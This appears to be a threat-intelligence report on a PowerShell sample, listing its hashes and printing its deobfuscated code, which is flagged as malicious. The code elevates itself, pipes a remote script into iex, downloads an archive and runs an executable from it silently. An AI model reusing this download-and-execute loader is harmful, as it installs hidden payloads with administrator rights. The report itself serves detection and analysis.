|
Hash | Hash Value |
|---|---|
| MD5 | 06176c46b973cb88804bc820452c93a4
|
| Sha1 | 166dcd965225e1ea7b3765e7d38985ea80b779a3
|
| Sha256 | 7cd9942662433becf244379c67a71c53ec3588552e0d0acc7018559a4ddaac44
|
| Sha384 | 10a8b11f9609ab90fcaf5988eddbe441be2764b634956a80ef94385a3451c85affc268b8c31e9d63c7432a50d245b439
|
| Sha512 | 0413460dcaac4910c2f51e5f2fd23d9660943f64cd724f8ad3a3bd52e1771890d39e59f92b94ffd209a19f41e81a13233e947686a10ebbaaaa15d882f83723cd
|
| SSDeep | 48:we11VHdHLrdwbmMfKYmFROvd9jEgWQfSLq1kMC2DbqrzOIEdJJ:pHdtwK+mFEvduLukMWrLi
|
| TLSH | 124175C9C882621A19DD068FDCAF6650525B803DC54B8FA0F8BC5426BBFB75F4256087
|
|
Name | Value |
|---|---|
| Deobfuscated PowerShell | -verb "RunAs" -ArgumentList "-NoProfile -ExecutionPolicy Bypass -Command "irm $ScriptUrl | iex"" exit $work = Join-Path $env:TEMP "app_install" $zip = Join-Path $work "Release.zip" $sevenZip = Join-Path $work "7za.exe" $dest = Join-Path $work "extracted" show-installheader write-step 1 "Downloading components" if (Test-Path $work) { Remove-Item $work -Recurse -Force } New-Item -ItemType "Directory" -Path $work -Force | Out-Null Invoke-RestMethod $SevenZipUrl -OutFile $sevenZip Invoke-RestMethod $ZipUrl -OutFile $zip write-step 2 "Preparing files" & $sevenZip "x" $zip "-o$dest" "-p$Password" -y | Out-Null if ($LASTEXITCODE -ne 0) { throw "Extract failed (code $LASTEXITCODE)" } $exe = Join-Path $dest $ExeName if ((Test-Path $exe)) { throw "Installer not found: $exe" } write-step 3 "Running setup" Start-Process $exe -ArgumentList $SilentArgs -Wait |
|
Name | Value | Location |
|---|---|---|
| Deobfuscated PowerShell | -verb "RunAs" -ArgumentList "-NoProfile -ExecutionPolicy Bypass -Command "irm $ScriptUrl | iex"" exit $work = Join-Path $env:TEMP "app_install" $zip = Join-Path $work "Release.zip" $sevenZip = Join-Path $work "7za.exe" $dest = Join-Path $work "extracted" show-installheader write-step 1 "Downloading components" if (Test-Path $work) { Remove-Item $work -Recurse -Force } New-Item -ItemType "Directory" -Path $work -Force | Out-Null Invoke-RestMethod $SevenZipUrl -OutFile $sevenZip Invoke-RestMethod $ZipUrl -OutFile $zip write-step 2 "Preparing files" & $sevenZip "x" $zip "-o$dest" "-p$Password" -y | Out-Null if ($LASTEXITCODE -ne 0) { throw "Extract failed (code $LASTEXITCODE)" } $exe = Join-Path $dest $ExeName if ((Test-Path $exe)) { throw "Installer not found: $exe" } write-step 3 "Running setup" Start-Process $exe -ArgumentList $SilentArgs -Wait Malicious |
06176c46b973cb88804bc820452c93a4 > [PowerShell Command] |